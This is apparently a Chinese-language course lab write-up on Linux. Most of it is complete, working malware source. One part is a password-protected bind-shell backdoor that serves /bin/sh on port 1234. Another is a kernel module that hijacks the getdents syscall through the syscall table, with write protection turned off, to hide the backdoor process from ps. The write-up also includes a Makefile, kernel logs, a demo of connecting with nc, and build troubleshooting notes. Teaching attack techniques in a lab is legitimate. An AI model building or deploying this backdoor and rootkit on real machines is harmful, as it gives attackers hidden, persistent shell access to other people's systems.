

一 前言

文章不講解理論知識哈,想學習理論知識的,認真聽課😄,也能夠參考郭老師的講義:信息安全課程 ustcsse308html


實驗環境 / 工具:linux




二 Talk is cheap, show me the code


Makefile(再次強調一遍,不要更改Makefile文件的名稱,而且因爲make命令的限制,make -C ... 的前面必須是2個tab(不能將tab轉爲空格) shell

1 obj-m += lcx-pshider.o
3 all:
4         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) modules
5 clean:
6         make -C /lib/modules/$(shell uname -r)/build M=$(PWD) clean
View Code


 1 #include <stdio.h>
 2 #include <sys/socket.h>
 3 #include <unistd.h>
 4 #include <netinet/in.h>
 5 #include <stdlib.h>
 6 #include <string.h>
 8 #define BUFF_SIZE 128
 9 #define PORT      1234
11 int main(int argc, char argv[]) {
12     int i, listenfd, acptfd;
13     pid_t pid;
14     char buf[BUFF_SIZE];
15     socklen_t sklen;
16     struct sockaddr_in saddr;
17     struct sockaddr_in caddr;
18     char enterpass[32] = "Password: ";
19     char welcome[32] = "Welcome\n";
20     char password[5] = "1234";
21     char sorry[50] = "Connection failure, error password";
23     if ((listenfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0) {
24         perror("socket creation error");
25         exit(1);
26     }
27     bzero(&saddr, sizeof(saddr));
28     saddr.sin_family = AF_INET;
29     saddr.sin_addr.s_addr = htonl(INADDR_ANY);
30     saddr.sin_port = htons(PORT);
32     if (bind(listenfd, (struct sockaddr *)&saddr, sizeof(saddr)) < 0 
33         || listen(listenfd, 20) < 0) {
34         exit(1);
35     }
36     sklen = sizeof(caddr);
38     while (1) {
39         acptfd = accept(listenfd, (struct sockaddr *)&caddr, &sklen);
40         if ((pid = fork()) > 0) {
41             exit(0);
42         } else if (!pid) {
43             close(listenfd);
44             write(acptfd, enterpass, strlen(enterpass));
45             memset(buf, '\0', BUFF_SIZE);
46             read(acptfd, buf, BUFF_SIZE);
47             if (strncmp(buf, password, strlen(password)) != 0) {
48                 write(acptfd, sorry, strlen(sorry));
49                 close(acptfd);
50                 exit(0);
51             } else {
52                 write(acptfd, welcome, strlen(welcome));
53                 dup2(acptfd, 0);
54                 dup2(acptfd, 1);
55                 dup2(acptfd, 2);
56                 execl("/bin/sh", "backdoor", NULL);
57             }
58         }
59     }
60     close(acptfd);
61     return 0;
62 }
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  1 #include <linux/module.h>
  2 #include <linux/kernel.h>
  3 #include <linux/uaccess.h>
  4 #include <linux/slab.h>
  5 #include <linux/fs.h>
  6 #include <linux/string.h>
  8 /* https://elixir.bootlin.com/linux/v4.10.17/source/fs/readdir.c#L150
  9  * http://www.man7.org/linux/man-pages/man2/getdents.2.html
 10  * http://www.man7.org/linux/man-pages/man3/readdir.3.html
 11  */
 12 struct linux_dirent {
 13     unsigned long   d_ino;     /* Inode number */
 14     unsigned long   d_off;     /* Offset to next linux_dirent */
 15     unsigned short  d_reclen;  /* Length of this linux_dirent */
 16     char            d_name[1]; /* Filename (null-terminated) */
 17 };
 19 static unsigned long **sys_call_table;
 21 /* The system call getdents() reads several linux_dirent structures 
 22  * from the directory referred to by the open file descriptor fd into the buffer pointed to by dirp. 
 23  * The argument count specifies the size of that buffer.
 24  */
 25 long (*orig_getdents)(unsigned int fd,
 26                       struct linux_dirent __user *dirp,
 27                       unsigned int count);
 29 void disable_write_protection(void) {
 30     unsigned long cr0 = read_cr0();
 31     clear_bit(16, &cr0);
 32     write_cr0(cr0);
 33 }
 35 void enable_write_protection(void) {
 36     unsigned long cr0 = read_cr0();
 37     set_bit(16, &cr0);
 38     write_cr0(cr0);
 39 }
 41 /**
 42  * 獲取 PID 的長度
 43  * 1) 若當前<dirent>是由命令<ps>產生的結果,則返回PID的長度,如:
 44  *     d_name = "2904" => return 4
 45  * 2) 若當前<dirent>不是由命令<ps>產生的結果,則返回-1,如:
 46  *     d_name = "kcore" => return -1
 47  * @author southday
 48  * @date 2019.05.01
 49  */
 50 int get_pid_len(char *d_name) {
 51     int len = 0;
 52     char *p;
 53     for (p = d_name+strlen(d_name)-1; p >= d_name; p--) {
 54         if (*p >= '0' && *p <= '9')
 55             len++;
 56         else
 57             return -1;
 58     }
 59     return len;
 60 }
 62 /**
 63  * 判斷當前<dirent>是否須要過濾
 64  * 假設進程<backdoor>的PID爲5930,則/proc/5930/status文件的第一行就包含<backdoor>進程的名稱,以下:
 65  * > cat /proc/5930/status | head -n 1
 66  *   Name:   backdoor
 67  * 根據匹配/proc/${PID}/status中的進程名稱來決定是否過濾該<dirent>
 68  * @author southday
 69  * @date 2019.05.01
 70  */
 71 int need_filter(char *d_name) {
 72     int isneed = 0, pidlen = 0;
 73     struct file *fp;
 74     mm_segment_t fs;
 75     loff_t pos;
 76     char *buf = NULL;
 77     char *fpath = NULL;
 78     char *proc = "/proc/";
 79     char *status = "/status";
 81     if ((pidlen = get_pid_len(d_name)) < 0)
 82         goto out;
 84     buf = (char *)kmalloc(64, GFP_KERNEL);
 85     fpath = (char *)kmalloc(pidlen+14, GFP_KERNEL);
 86     if (buf == NULL || fpath == NULL)
 87         goto out;
 89     // e.g: /proc/2842/status
 90     memmove(fpath, (char *)proc, 6);            // /proc/
 91     memmove(fpath+6, (char *)d_name, pidlen);   // /proc/2842
 92     memmove(fpath+6+pidlen, (char *)status, 7); // /proc/2842/status
 93     fpath[13+pidlen] = '\0';
 94     printk("pid = %s, pidlen = %d\n", d_name, pidlen);    
 95     printk("fpath = %s\n", fpath);
 97     fp = filp_open(fpath, O_RDONLY, 0000);
 98     if (IS_ERR(fp)) {
 99         printk("file open error, file path: %s\n", fpath);
100         goto out;
101     }
103     fs = get_fs(); // 取當前fs值
104     set_fs(KERNEL_DS); // 設置fs值,忽略對用戶空間地址的檢查
105     pos = 0;
106     /* ssize_t vfs_read(struct file* filp, char __user* buffer, size_t len, loff_t* pos);
107      * 1) 第2個參數被 __user* 修飾,表示buffer應該指向用戶空間的內存,而這裏的buf指向的是內核空間的內存;
108      * 2) 若是不進行set_fs(KERNEL_DS)設置,vfs_read()函數會返回失敗-EFAULT;
109      * 3) set_fs(KERNEL_DS) 繞過對buffer所指內存空間的檢查,讓下面的vfs_read()函數得以繼續進行;
110      */
111     vfs_read(fp, buf, 64, &pos);
112     if (strstr(buf, "backdoor") != NULL) {
113         isneed = 1;
114         printk("read: \n%s\n", buf); // Name: backdoor
115     }
116     filp_close(fp, NULL);
117     set_fs(fs); // 恢復fs
118 out:
119     kfree(buf);
120     kfree(fpath);
121     return isneed;
122 }
124 /**
125  * 系統調用劫持函數,劫持ps,過濾掉名爲 backdoor 的進程
126  * @author southday
127  * @date 2019.05.01
128  */
129 asmlinkage long hack_getdents(unsigned int fd,
130                               struct linux_dirent __user *dirp,
131                               unsigned int count) {
132     int number = 0, copylen = 0;
133     struct linux_dirent *filtered_dirp, // 指向已完成過濾的<dirent>
134                         *orig_dirp,     // 指向原始的<dirent>
135                         *td1, *td2;     // 用於遍歷、鏈接的臨時指針
137     /* 若是不設置td1, td2,直接用filtered_dirp和orig_dirp進行遍歷和鏈接,
138      * 那麼在kfree()時就會有問題,由於這兩個指針的值已經改變了
139      */
140     if ((number = (*orig_getdents)(fd, dirp, count)) == 0)
141         return 0;
143     filtered_dirp = (struct linux_dirent *)kmalloc(number, GFP_KERNEL);
144     td1 = filtered_dirp;
145     orig_dirp = (struct linux_dirent *)kmalloc(number, GFP_KERNEL);
146     td2 = orig_dirp;
147     copy_from_user(orig_dirp, dirp, number);
149     while (number > 0) {
150         number -= td2->d_reclen;
151         // 鏈表尾插法,忽略掉要過濾的內容,將要保留的<dirent>一個個的插到鏈表td1尾部
152         if (!need_filter(td2->d_name)) {
153             memmove(td1, (char *)td2, td2->d_reclen);
154             td1 = (struct linux_dirent *)((char *)td1 + td2->d_reclen);
155             copylen += td2->d_reclen;
156         }
157         td2 = (struct linux_dirent *)((char *)td2 + td2->d_reclen);
158     }
160     copy_to_user(dirp, filtered_dirp, copylen);
161     kfree(orig_dirp);
162     kfree(filtered_dirp);
163     return copylen;
164 }
166 /**
167  * 獲取 sys_call_table 的首地址
168  * @author southday
169  * @date 2019.05.01
170  */
171 unsigned long ** find_sct(void) {
172     u64 lstar, i;
173     void *lstar_sct_addr = NULL;
175     // 將寄存器MSR_LSTAR中的值讀到lstar中,該值是system_call處理例程的地址
176     rdmsrl(MSR_LSTAR, lstar);
177     for (i = 0; i <= PAGE_SIZE; i += 1) {
178         u8 *arr = (u8 *)lstar + i;
179         /* 搜索負責進行系統調用的代碼段,匹配call指令機器碼
180          * call disp32(,%rax,8) ==> FF 14 C5 -- -- -- --
181          * 1) FF 14 C5 是entry_SYSCALL_64的機器碼
182          * 2) disp32 是SCT的首地址
183          */
184         if (arr[0] == 0xff && arr[1] == 0x14 && arr[2] == 0xc5) {
185             lstar_sct_addr = arr + 3;
186             break;
187         }
188     }
189     // 擴展爲64位,由於SCT首地址符號位爲1,因此前面32位直接補1就能夠
190     return lstar_sct_addr == NULL ? NULL : (void *)(0xffffffff00000000 | *(u32 *)lstar_sct_addr);
191 }
193 static int filter_init(void) {
194     printk("fitler_init\n");
195     sys_call_table = find_sct();
196     if (!sys_call_table) {
197         printk("sys_call_table = NULL\n");
198         return 0;
199     }
200     orig_getdents = (void *)sys_call_table[__NR_getdents];
201     printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents);
202     disable_write_protection();
203     sys_call_table[__NR_getdents] = (unsigned long *)&hack_getdents;
204     enable_write_protection();
205     printk("hacked system call getdents, the address is 0x%p\n", (unsigned long *)&hack_getdents);
206     printk("modify sct success! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]);
207     return 0;
208 }
210 static void filter_exit(void) {
211     disable_write_protection();
212     sys_call_table[__NR_getdents] = (unsigned long *)orig_getdents;
213     enable_write_protection();
214     printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents);
215     printk("hack module removed! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]);
216     printk("fitler_exit\n");
217 }
220 module_init(filter_init);
221 module_exit(filter_exit);
View Code


三 前期準備

主要關注下 ls 和 ps 關於 direntry 的區別


  1 #include <linux/module.h>
  2 #include <linux/kernel.h>
  3 #include <linux/uaccess.h>
  4 #include <linux/slab.h>
  6 /* https://elixir.bootlin.com/linux/v4.10.17/source/fs/readdir.c#L150
  7  * http://www.man7.org/linux/man-pages/man2/getdents.2.html
  8  * http://www.man7.org/linux/man-pages/man3/readdir.3.html
  9  */
 10 struct linux_dirent {
 11     unsigned long   d_ino;     /* Inode number */
 12     unsigned long   d_off;     /* Offset to next linux_dirent */
 13     unsigned short  d_reclen;  /* Length of this linux_dirent */
 14     char            d_name[1]; /* Filename (null-terminated) */
 15 };
 17 static unsigned long **sys_call_table;
 19 long (*orig_getdents)(unsigned int fd,
 20                       struct linux_dirent __user *dirp,
 21                       unsigned int count);
 23 void disable_write_protection(void) {
 24     unsigned long cr0 = read_cr0();
 25     clear_bit(16, &cr0);
 26     write_cr0(cr0);
 27 }
 29 void enable_write_protection(void) {
 30     unsigned long cr0 = read_cr0();
 31     set_bit(16, &cr0);
 32     write_cr0(cr0);
 33 }
 35 asmlinkage long hack_getdents(unsigned int fd,
 36                               struct linux_dirent __user *dirp,
 37                               unsigned int count) {
 38     int number, temp;
 39     struct linux_dirent *orig_dirp, // original dirent data
 40                         *td2;       // traverse pointer
 42     if ((number = (*orig_getdents)(fd, dirp, count)) == 0)
 43         return 0;
 45     temp = number;
 46     orig_dirp = (struct linux_dirent *)kmalloc(number, GFP_KERNEL);
 47     td2 = orig_dirp;
 48     copy_from_user(orig_dirp, dirp, number);
 49     while (number > 0) {
 50         printk("%lu -> %s\n", td2->d_ino, td2->d_name);
 51         number -= td2->d_reclen;
 52         td2 = (struct linux_dirent *)((char *)td2 + td2->d_reclen);
 53     }
 54     kfree(orig_dirp);
 55     return temp;
 56 }
 58 unsigned long ** find_sct(void) {
 59     u64 lstar, i;
 60     void *lstar_sct_addr = NULL;
 62     rdmsrl(MSR_LSTAR, lstar);
 63     for (i = 0; i <= PAGE_SIZE; i += 1) {
 64         u8 *arr = (u8 *)lstar + i;
 65         if (arr[0] == 0xff && arr[1] == 0x14 && arr[2] == 0xc5) {
 66             lstar_sct_addr = arr + 3;
 67             break;
 68         }
 69     }
 70     return lstar_sct_addr == NULL ? NULL : (void *)(0xffffffff00000000 | *(u32 *)lstar_sct_addr);
 71 }
 73 static int filter_init(void) {
 74     printk("fitler_init\n");
 75     sys_call_table = find_sct();
 76     if (!sys_call_table) {
 77         printk("sys_call_table = NULL\n");
 78         return 0;
 79     }
 80     orig_getdents = (void *)sys_call_table[__NR_getdents];
 81     printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents);
 82     disable_write_protection();
 83     sys_call_table[__NR_getdents] = (unsigned long *)&hack_getdents;
 84     enable_write_protection();
 85     printk("hacked system call getdents, the address is 0x%p\n", (unsigned long *)&hack_getdents);
 86     printk("modify sct success! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]);
 87     return 0;
 88 }
 90 static void filter_exit(void) {
 91     disable_write_protection();
 92     sys_call_table[__NR_getdents] = (unsigned long *)orig_getdents;
 93     enable_write_protection();
 94     printk("original system call getdents, the address is 0x%p\n", (unsigned long *)orig_getdents);
 95     printk("hack module removed! sys_call_table[__NR_getdents] address is 0x%p\n", (unsigned long *)sys_call_table[__NR_getdents]);
 96     printk("fitler_exit\n");
 97 }
100 module_init(filter_init);
101 module_exit(filter_exit);
View Code

insmod後,tail -f /var/log/syslog 查看日誌:

ls命令,d_name 都是文件名

 1 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ sudo insmod pshider.ko
 2 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ ls
 3 log.sh    modules.order   pshider.c   pshider.mod.c  pshider.o
 4 Makefile  Module.symvers  pshider.ko  pshider.mod.o
 6 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ tail -f /var/log/syslog
 7 May  1 00:10:07 ubuntu kernel: [  367.437543] fitler_init
 8 May  1 00:10:07 ubuntu kernel: [  367.437545] original system call getdents, the address is 0xffffffffb0e599a0
 9 May  1 00:10:07 ubuntu kernel: [  367.437548] hacked system call getdents, the address is 0xffffffffc029b000
10 May  1 00:10:07 ubuntu kernel: [  367.437549] modify sct success! sys_call_table[__NR_getdents] address is 0xffffffffc029b000
11 May  1 00:10:10 ubuntu kernel: [  369.661008] 278608 -> pshider.mod.c
12 May  1 00:10:10 ubuntu kernel: [  369.661008] 278587 -> Makefile
13 May  1 00:10:10 ubuntu kernel: [  369.661009] 278754 -> .pshider.o.cmd
14 May  1 00:10:10 ubuntu kernel: [  369.661009] 278605 -> pshider.o
15 May  1 00:10:10 ubuntu kernel: [  369.661009] 278756 -> .pshider.ko.cmd
16 May  1 00:10:10 ubuntu kernel: [  369.661009] 278610 -> pshider.ko
17 May  1 00:10:10 ubuntu kernel: [  369.661010] 278606 -> pshider.mod.o
18 May  1 00:10:10 ubuntu kernel: [  369.661010] 278841 -> .pshider.mod.o.cmd
19 May  1 00:10:10 ubuntu kernel: [  369.661010] 278607 -> modules.order
20 May  1 00:10:10 ubuntu kernel: [  369.661010] 278753 -> .tmp_versions
21 May  1 00:10:10 ubuntu kernel: [  369.661010] 278752 -> .
22 May  1 00:10:10 ubuntu kernel: [  369.661011] 278603 -> pshider.c
23 May  1 00:10:10 ubuntu kernel: [  369.661011] 278580 -> ..
24 May  1 00:10:10 ubuntu kernel: [  369.661011] 278832 -> log.sh
25 May  1 00:10:10 ubuntu kernel: [  369.661011] 278609 -> Module.symvers
26 ...
27 May  1 00:10:36 ubuntu kernel: [  396.198553] original system call getdents, the address is 0xffffffffb0e599a0
28 May  1 00:10:36 ubuntu kernel: [  396.198554] hack module removed! sys_call_table[__NR_getdents] address is 0xffffffffb0e599a0
29 May  1 00:10:36 ubuntu kernel: [  396.198554] fitler_exit
View Code

ps命令,d_name 是進程PID

 1 lcx@ubuntu:~/Documents/InfoSecLab/E3$ ./backdoor &
 2 [1] 2826
 4 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ sudo insmod pshider.ko
 5 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ ps -aux | grep backdoor
 6 lcx        2826  0.0  0.0   4224   648 pts/19   S    00:20   0:00 ./backdoor
 7 lcx        2842  0.0  0.0  21292   928 pts/6    S+   00:21   0:00 grep --color=auto backdoor
 9 lcx@ubuntu:~/Documents/InfoSecLab/E3/pshider$ tail -f /var/log/syslog
10 May  1 00:20:49 ubuntu kernel: [ 1009.460784] fitler_init
11 May  1 00:20:49 ubuntu kernel: [ 1009.460786] original system call getdents, the address is 0xffffffffb0e599a0
12 May  1 00:20:49 ubuntu kernel: [ 1009.460790] hacked system call getdents, the address is 0xffffffffc029b000
13 May  1 00:20:49 ubuntu kernel: [ 1009.460790] modify sct success! sys_call_table[__NR_getdents] address is 0xffffffffc029b000
14 May  1 00:21:01 ubuntu kernel: [ 1020.909999] 1 -> .
15 May  1 00:21:01 ubuntu kernel: [ 1020.910000] 1 -> ..
16 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531963 -> fb
17 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531846 -> fs
18 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531854 -> bus
19 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026532028 -> dma
20 May  1 00:21:01 ubuntu kernel: [ 1020.910001] 4026531858 -> irq
21 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026532408 -> mpt
22 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531844 -> net
23 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531855 -> sys
24 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531849 -> tty
25 May  1 00:21:01 ubuntu kernel: [ 1020.910002] 4026531965 -> acpi
26 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026532045 -> keys
27 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531996 -> kmsg
28 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531967 -> misc
29 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531961 -> mtrr
30 May  1 00:21:01 ubuntu kernel: [ 1020.910003] 4026531969 -> scsi
31 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026531991 -> stat
32 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026532024 -> iomem
33 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026531995 -> kcore
34 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026531983 -> locks
35 May  1 00:21:01 ubuntu kernel: [ 1020.910004] 4026532037 -> swaps
36 ...
37 May  1 00:21:01 ubuntu kernel: [ 1020.910013] 14359 -> 1
38 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 227 -> 2
39 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 231 -> 4
40 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 235 -> 6
41 May  1 00:21:01 ubuntu kernel: [ 1020.910014] 237 -> 7
42 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 239 -> 8
43 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 241 -> 9
44 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 243 -> 10
45 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 245 -> 11
46 May  1 00:21:01 ubuntu kernel: [ 1020.910015] 247 -> 12
47 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 249 -> 13
48 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 251 -> 14
49 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 253 -> 15
50 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 255 -> 16
51 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 259 -> 18
52 May  1 00:21:01 ubuntu kernel: [ 1020.910016] 261 -> 19
53 May  1 00:21:01 ubuntu kernel: [ 1020.910017] 263 -> 20
54 ...
55 May  1 00:21:01 ubuntu kernel: [ 1020.910061] 31098 -> 2826
56 May  1 00:21:01 ubuntu kernel: [ 1020.910061] 31098 -> 2826
57 ...
58 May  1 00:21:50 ubuntu kernel: [ 1070.023470] original system call getdents, the address is 0xffffffffb0e599a0
59 May  1 00:21:50 ubuntu kernel: [ 1070.023471] hack module removed! sys_call_table[__NR_getdents] address is 0xffffffffb0e599a0
60 May  1 00:21:50 ubuntu kernel: [ 1070.023471] fitler_exit
View Code

👉 根據PID獲取進程名&根據進程名獲取PID


四 效果演示

1 後門程序運行效果

1)在 mice 上裝上後門程序 backdoor,後臺運行該程序;

2)hacker 用 nc 鏈接上後門程序,能夠得到一個shell,如圖:

2 在 mice 中載入內核模塊 lcx-pshider.ko

1)載入前執行 ps

2)載入內核模塊 lcx-pshider.ko,查看日誌 tail -f /var/log/syslog,執行 ps

3)執行 ps,發現 backdoor 被隱藏了

4)移除內核模塊 lcx-pshider,再次執行 ps,backdoor 現身了


五 遇到的問題&解決

1 warning: missing sentinel in function call

backdoor.c:55:17: warning: missing sentinel in function call [-Wformat=]
                  execl("/bin/sh", "backdoor", 0);
// sentinel  /'sentɪn(ə)l/,n. 哨兵

將代碼改成:execl("/bin/sh", "backdoor", (char *)0);
或者改成:execl("/bin/sh", "backdoor", NULL);

1.1 bind(listenfd, (struct sockaddr *)&saddr, sizeof(saddr)

#include <sys/types.h>
#include <sys/socket.h>
int bind(int socket, const struct sockaddr* my_addr, socklen_t addrlen);

調用成功返回0, 失敗返回-1,並設置errno;

1.2 listen(listenfd, 20)

#include <sys/socket.h>
int listen(int sockfd, int backlog);

2)backlog參數提示內核監聽隊列的最大長度。若是監聽隊列的長度超過backlog,服務器將不受理新的客戶鏈接,客戶端也將收到ECONNREFUSED錯誤信息。在內核版本2.2以前,backlog是指全部處於半鏈接狀態(SYN_RCVD)和徹底鏈接狀態(ESTABLISHED)的socket上限。但在內核版本2.2之後, 它只表示處於徹底鏈接狀態的socket上限,處於半鏈接狀態的socket上限則由/proc/sys/net/ipv4/tcp_max_syn_backlog內核參數定義。

1.3 accept(listenfd, (struct sockaddr *)&caddr, &sklen)

#include <sys/types.h>
#include <sys/socket.h>
int accept(int sockfd, struct sockaddr* addr, socklen_t *addrlen);


1.一、1.二、1.3,參考資料:linux網絡編程二:基礎socket, bind, listen, accept, connect

2 Linux 內核 4.8.17 中 copy_from_user() 和 copy_to_user()

在:<linux/uaccess.h> 中;參考:


./arch/x86/include/asm/uaccess.h:32:9: error: dereferencing pointer to incomplete type ‘struct task_struct’
  current->thread.addr_limit = fs;

把代碼中的 #include <asm/uaccess.h> 替換爲 #include <linux/uaccess.h>,不要兩個都引入;


3 編譯時的 waring:ISO C90 forbids mixed declarations and code

/home/lcx/Documents/InfoSecLab/E3/ls_hide.c:69:5: warning: ISO C90 forbids mixed declarations and code [-Wdeclaration-after-statement]
     unsigned long *lstar_sct_addr = (unsigned long *)get_lstar_sct_addr();

把變量 *lstar_sct_addr 的聲明放到函數的最前面:

參考:ISO C90 forbids mixed declarations and code in C

4 rmmod module error


rmmod:rmmod: ERROR: Module ls_hide is in use;
rmmod: ERROR: ../libkmod/libkmod-module.c:793 kmod_module_remove_module() could not remove 'ls_hide': Device or resource busy
rmmod: ERROR: could not remove module ls_hide: Device or resource busy

5 如何根據PID獲取到進程名稱

mice 後臺運行 backdoor:> ./backdoor &
查看進程:> ps aux | tail -n 3

根據進程PID找到進程名稱:> cat /proc/3010/status | head -n 10

6 char *strstr(const char *haystack, const char *needle) 的使用;

參考:C語言(函數)學習之strstr strcasestr

 1 #include <stdio.h>
 2 #include <string.h>
 4 int main() {
 5     char *s = "http://see.xidian.edu.cn/cpp/u/xitong/";
 6     char *r = NULL;
 7     if ((r = strstr(s, "xidian")) != NULL)
 8         printf("%s\n", r);
 9     if ((r = strstr(s, "xcvklweu")) != NULL)
10         printf("%s\n", r);
11     return 0;
12 }
13 // 輸出
14 xidian.edu.cn/cpp/u/xitong/
View Code

7 u8 u64 等意思

參考:C 語言printf打印各類數據類型的方法(u8/s8/u16/s16.../u64/double/float)(全)

 1 typedef signed char s8;
 2 typedef unsigned char u8;
 4 typedef signed short s16;
 5 typedef unsigned short u16;
 7 typedef signed int s32;
 8 typedef unsigned int u32;
10 typedef signed long long s64;
11 typedef unsigned long long u64;
View Code

8 什麼是 getdents()?readdir()?

getdents,getdents64 —— get directory entries

struct dirent {
   ino_t          d_ino;       /* Inode number */
   off_t          d_off;       /* Not an offset; see below */
   unsigned short d_reclen;    /* Length of this record */
   unsigned char  d_type;      /* Type of file; not supported
                                  by all filesystem types */
   char           d_name[256]; /* Null-terminated filename */


The system call getdents() reads several linux_dirent structures from the directory referred to by the open file descriptor fd into the buffer pointed to by dirp. The argument count specifies the size of that buffer.



9 關於 struct linux_dirent,struct linux_dirent64

在 fs/readdir.c 中有 linux_dirent 的定義,以下:

struct linux_dirent {
    unsigned long   d_ino;
    unsigned long   d_off;
    unsigned short  d_reclen;
    char        d_name[1];

你能夠在 ps_hider.c 文件中定義本身的 linux_dirent 結構體,或者使用 linux/dirent.h 中定義好的 linux_dirent64 結構體,以下:

struct linux_dirent64 {
    u64     d_ino;
    s64     d_off;
    unsigned short  d_reclen;
    unsigned char   d_type;
    char        d_name[0];
// 須要包含頭文件 <linux/dirent.h>


10 什麼是 GLIBC?
1)GNU C庫(英語:GNU C Library,常簡稱爲glibc)是一種按照LGPL許可協議發佈的,自由的,公開源代碼的,方便從網絡下載的C的編譯程序。GNU C運行期庫,是一種C函數庫,是程序運行時使用到的一些API集合,它們通常是已預先編譯好,以二進制代碼形式存在Linux類系統中,GNU C運行期庫一般做爲GNU C編譯程序的一個部分發布。
參考:GNU C庫:https://zh.wikipedia.org/wiki/GNU_C%E5%87%BD%E5%BC%8F%E5%BA%AB

11 __user 修飾符的做用?


asmlinkage long my_getdents(unsigned int fd, struct linux_dirent __user *dirp, unsigned int count){}


  • __user代表參數是一個用戶空間的指針,不能在kernel代碼中直接訪問。也方便其它工具對代碼進行檢查;
  • 它容許像sparse這樣的工具告訴內核開發人員他們可能使用不可信的指針(或者在當前虛擬地址映射中可能無效的指針)不正確。


12 error: function declaration isn’t a prototype

/home/lcx/Documents/InfoSecLab/E3/pshider/lcx-ps_hider.c:5:6: error: function declaration isn’t a prototype [-Werror=strict-prototypes]
void disable_write_protection() {

從新定義函數爲:void disable_write_protection(void) {}

13 爲何 sys_call_table 的類型要聲明爲 unsigned long **?

參考的代碼 ps_hide.c 中有代碼:

static unsigned long **sys_call_table;

在 arch/x86/kernel/syscall_64.c 中找到 sys_call_table 的定義:

asmlinkage const sys_call_ptr_t sys_call_table[__NR_syscall_max+1] = {
     * Smells like a compiler bug -- it doesn't work
     * when the & below is removed.
    [0 ... __NR_syscall_max] = &sys_ni_syscall,
#include <asm/syscalls_64.h>

在 arch/x86/include/asm/syscall.h 中找到 sys_call_ptr_t 的定義:

typedef asmlinkage long (*sys_call_ptr_t)(unsigned long, unsigned long,
                                          unsigned long, unsigned long,
                                          unsigned long, unsigned long);
extern const sys_call_ptr_t sys_call_table[];


  • sys_call_table[] 中保存的是一系列系統調用的函數指針;
  • 每個函數指針(函數)都是返回 long類型數據,而且有一組 unsigned long 類型的參數;



14 void * 指針的做用?


void *p;
int *pa = (int *)p;


int a = 1;
int *pa = &a;
void *p = pa; // 無需強轉


15 GCC G++ 編譯有何區別?


 1 #include <stdio.h>
 2 #include <string.h>
 4 unsigned long ** getllp();
 5 void cast_test();
 7 int main() {
 8     unsigned long **llp = getllp();
 9     printf("llp = %p\n", llp);
10     cast_test();
11     return 0;
12 }
14 unsigned long ** getllp() {
15     int a = 1;
16     void *p = &a;
17     printf("p = %p\n", p);
18     return (void *)(0xffffffff00000000 | *(unsigned int *)p);
19 }
21 void cast_test() {
22     int a = 1;
23     void *p = &a;
24     unsigned long **llp = (void *)(0xffffffff00000000 | *(unsigned int *)p);
25     printf("p = %p, llp = %p\n", p, llp);
26 }
View Code

GCC 編譯:

G++ 編譯:

也就是說,void * 轉換爲其餘類型指針時:

  • GCC 無需顯示強制轉換,仍是說編譯器內部自動幫你轉換?
  • G++ 須要顯示的強制轉換,不然編譯失敗;


  • 1)後綴爲.c的,gcc把它看成是C程序,而g++看成是c++程序;後綴爲.cpp的,二者都會認爲是c++程序;
  • 2)c++是c的超集,二者對語法的要求是有區別的,C++的語法規則更加嚴謹一些;
  • 3)在編譯階段,g++會調用gcc,對於c++代碼,二者是等價的,可是由於gcc命令不能自動和C++程序使用的庫聯接,因此一般用g++來完成連接;

參考: gcc與g++的區別:http://www.javashuo.com/article/p-cdzbplqe-dv.html

16 PAGE_SIZE 在哪裏定義?是什麼意思?

出自 ps_hide.c 中的 get_lstar_sct_addr 方法:

for (index = 0; index <= PAGE_SIZE; index += 1) {
    u8 *arr = (u8 *)lstar + index;
    if (arr[0] == 0xff && arr[1] == 0x14 && arr[2] == 0xc5) {
        return arr + 3;

PAGE_SIZE 在好多地方都有定義,我也不清楚具體引用的是哪個,在 arch/arc/include/uapi/asm/page.h 中定義以下:

#define PAGE_SIZE _BITUL(PAGE_SHIFT)        /* Default 8K */

17 rdmsrl() 函數的做用是什麼?

u64 lstar;
rdmsrl(MSR_LSTAR, lstar);
// 將寄存器 MSR_LSTAR 中的內容讀到 lstar 中

18 loff_t 的定義

在 include/linux/types.h 中定義以下,參考:https://elixir.bootlin.com/linux/v4.10.17/source/include/linux/types.h#L45

#if defined(__GNUC__)
typedef __kernel_loff_t loff_t;

__kernel_loff_t 在 include/uapi/asm-generic/posix_types.h 中定義以下:

